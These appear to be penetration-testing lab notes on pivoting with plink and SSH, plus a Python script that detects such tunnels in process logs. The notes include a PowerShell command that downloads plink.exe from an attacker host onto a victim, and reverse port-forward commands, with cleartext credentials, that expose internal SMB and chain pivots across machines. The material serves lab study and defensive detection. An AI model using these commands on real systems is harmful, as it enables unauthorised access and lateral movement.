Tunneling / (with SSH key)
Burp > proxychains > app: Settings > Network > Connections > SOCKS Proxy
plink ssh to kali from victim
#victim
netstat -ano #to see services not discovered during the nmap scan
#kali
python -m http.server 8080 #to host plink
service ssh start
#victim
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.158:8080/plink.exe','C:/hfs/tmp/plink.exe')
cmd.exe /c echo y | plink.exe -ssh -l kali -pw kalipwd -R 192.168.119.158:7799:127.0.0.1:445 192.168.119.158
#kali
nmap -sT -sV -sC -p 7799 127.0.0.1
#machine C
plink.exe -ssh -l b.user -pw b.pwd -N -R 10.1.1.9:1069:127.0.0.1:9050 10.1.1.9
#machine B 10.1.1.9
plink.exe -ssh -l kali -pw kalipwd -N -R 192.168.119.158:7799:127.0.0.1:1069 192.168.119.158
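Defender-side check for the plink commands above (an added example, not part of the original notes): it parses process-creation command lines, extracts each -R forward spec, and flags a loopback-only service being exposed, a password passed with -pw, and the host key prompt answered by a piped echo. The finding names, the function names and the sample log lines are assumptions made for this example.

```python
import re
import shlex

# Constructed sample process-creation command lines (e.g. Sysmon Event ID 1);
# addresses and credentials are the placeholders already used in these notes.
SAMPLE_CMDLINES = [
    "cmd.exe /c echo y | plink.exe -ssh -l kali -pw kalipwd -R 192.168.119.158:7799:127.0.0.1:445 192.168.119.158",
    "plink.exe -ssh -l b.user -pw b.pwd -N -R 10.1.1.9:1069:127.0.0.1:9050 10.1.1.9",
    "plink.exe -ssh -l admin -i C:/keys/ops.ppk fileserver01",
    "netstat -ano",
]

CLIENT = re.compile(r"(^|[\\/])(plink|ssh)(\.exe)?$", re.IGNORECASE)
LOOPBACK = {"127.0.0.1", "localhost", "::1"}

def parse_forward(spec):
    """Split '[bind:]listen_port:dest_host:dest_port' into a dict, or None."""
    parts = spec.split(":")
    if len(parts) == 3:
        parts = [""] + parts
    if len(parts) != 4 or not (parts[1].isdigit() and parts[3].isdigit()):
        return None
    return {"bind": parts[0], "listen_port": int(parts[1]),
            "dest_host": parts[2], "dest_port": int(parts[3])}

def analyze(cmdline):
    """Return a list of (finding, detail) tuples for one command line."""
    tokens = shlex.split(cmdline, posix=False)
    idx = next((i for i, t in enumerate(tokens) if CLIENT.search(t)), None)
    if idx is None:
        return []
    args, findings = tokens[idx + 1:], []
    for i, tok in enumerate(args):
        if tok == "-R" and i + 1 < len(args):
            fwd = parse_forward(args[i + 1])
            if fwd:
                findings.append(("remote_forward", fwd))
                if fwd["dest_host"] in LOOPBACK:
                    findings.append(("loopback_service_exposed", fwd["dest_port"]))
        elif tok == "-pw":
            findings.append(("cleartext_password_on_cmdline", None))
    lead = [t.lower() for t in tokens[:idx]]
    if "|" in lead and "echo" in lead:
        findings.append(("host_key_prompt_auto_answered", None))
    return findings

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyze(line) or "no findings", "<-", line)
```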
ssh to victim from kali
ssh from victim to kali
windows allowing other access local :80